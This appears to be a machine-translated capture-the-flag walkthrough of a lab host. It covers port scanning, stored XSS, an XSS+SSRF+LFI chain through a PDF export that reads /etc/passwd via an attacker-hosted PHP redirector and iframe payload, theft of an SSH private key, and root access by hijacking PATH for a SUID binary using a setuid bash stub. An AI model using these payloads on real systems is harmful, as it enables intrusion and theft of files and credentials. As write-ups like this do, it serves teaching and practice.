Catalog

One 、 The host found

Two 、 Service version detection

3、 ... and 、 information gathering

2. The main page

3. Source code

4. Try signing in

Four 、 Analysis function

1.export Output pdf

2.edit profile Edit the file

5、 ... and 、 Storage type xss

  6、 ... and 、 information gathering

1.export Output

7、 ... and 、 Combined boxing XSS+SSRF+LFI

1. Local open apache service

2. Inject payload

3.export Trigger

8、 ... and 、 Read gemini Private key

2.ssh Public private key login

  Nine 、find Information search

  Ten 、 Binary file view

1. /usr/bin/listinfo File analysis

2. The implementation of

11、 ... and 、 The system command file is forged

1. newly build date file

2. Modify environment variables

3. perform listinfo

One 、 The host found

Half open scan

nmap -sS ip

Two 、 Service version detection

3、 ... and 、 information gathering

1. Unable to load

80 The resources of the port cannot be loaded normally , Because I have been visiting Google Some sites of , Hang a ladder to visit .

2. The main page

The source code address is given to us

3. Source code

View one by one , stay install Under the folder [email protected]

4. Try signing in

  Successfully logged in , There are more functions in the upper left corner

Four 、 Analysis function

1.export Output pdf

2.edit profile Edit the file

The information we modify will be displayed intact on the information board . There is no filter at the user name ,

5、 ... and 、 Storage type xss

Not enough to help us break through the border

  6、 ... and 、 information gathering

1.export Output

We found an application in document attributes . It's just one. html turn pdf Application .

7、 ... and 、 Combined boxing XSS+SSRF+LFI

  After searching , We can know that these three vulnerabilities exist in this application component . Through the combination of vulnerabilities , To read local files .

1. Local open apache service

systemctl start apache2

cd /var/www/html

sudo vim 1.php

Create a 1.php file

write in ：

<?php
    $file = $_GET['file'];
    header("location:file://$file");

2. Inject payload

<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>

3.export Trigger

Successfully read /etc/passwd file . You can see gemini Can pass shell Sign in

8、 ... and 、 Read gemini Private key

Save to kali On

2.ssh Public private key login

Successfully logged in

  Nine 、find Information search

find / -type f -user root -perm -u+xs -ls  2>/dev/null

  Ten 、 Binary file view

1. /usr/bin/listinfo File analysis

strings  /usr/bin/listinfo

Content ：

The core code is these sentences , Called the system command

2. The implementation of

11、 ... and 、 The system command file is forged

1. newly build date file

vim date.c

Content ：

#include<sys/types.h>
#include<unistd.h>
#include<stdlib.h>

int main(){
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

2. Modify environment variables

First look at the front , Then look from the back

export PATH=/tmp:$PATH

3. perform listinfo

Mention right to success

  Get flag.txt